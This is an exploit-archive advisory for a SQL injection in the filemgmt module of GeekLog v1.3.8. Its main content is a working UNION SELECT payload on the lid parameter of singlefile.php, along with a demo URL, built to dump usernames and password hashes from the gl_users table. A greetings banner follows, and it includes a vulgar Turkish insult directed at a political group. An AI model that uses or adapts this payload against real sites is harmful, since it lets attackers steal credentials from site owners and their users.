[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : GeekLog v1.3.8 (filemgmt) SQL Injection Vulnerability
# Published : 2010-09-23
# Author : Gamoscu
# Previous Title : OvBB v0.16a Multiple Local File Inclusion Vulnerabilities
# Next Title : WAnewsletter v 2.1.2 SQL Injection Vulnerability
GeekLog v1.3.8 (filemgmt) SQL Injection Vulnerability
###########################
Author : Gamoscu
Homepage : http://www.1923turk.com
Blog :http://gamoscu.wordpress.com/
Script : http://www.geeklog.net/filemgmt/viewcat.php?cid=8
Download:http://www.geeklog.net/filemgmt/viewcat.php?cid=8
###########################
[ Vulnerable File ]
filemgmt/singlefile.php?lid=1 [ SQL ]
[ XpL ]
-1+union+all+select+1,2,concat_ws(username,0x3a,passwd),4,5,6,7,8,9,10,11,12,13,14,15,16+from+gl_users+limit+1,1--
[ Demo]
http://server/filemgmt/singlefile.php?lid=-1+union+all+select+1,2,concat_ws(username,0x3a,passwd),4,5,6,7,8,9,10,11,12,13,14,15,16+from+gl_users+limit+1,1--
##############################################################
#
#
#
# Baybora: http://baybora.wordpress.com/
#
# Manas58 ? Delibey ? Tiamo ? Psiko ? Turco ? infazci ? X-TRO
#
#
#
# #Elektrikist#
#
#
#
# FREEGAZA
#
#
# PKK ALEM SIKSIN SIZI
#
#############################################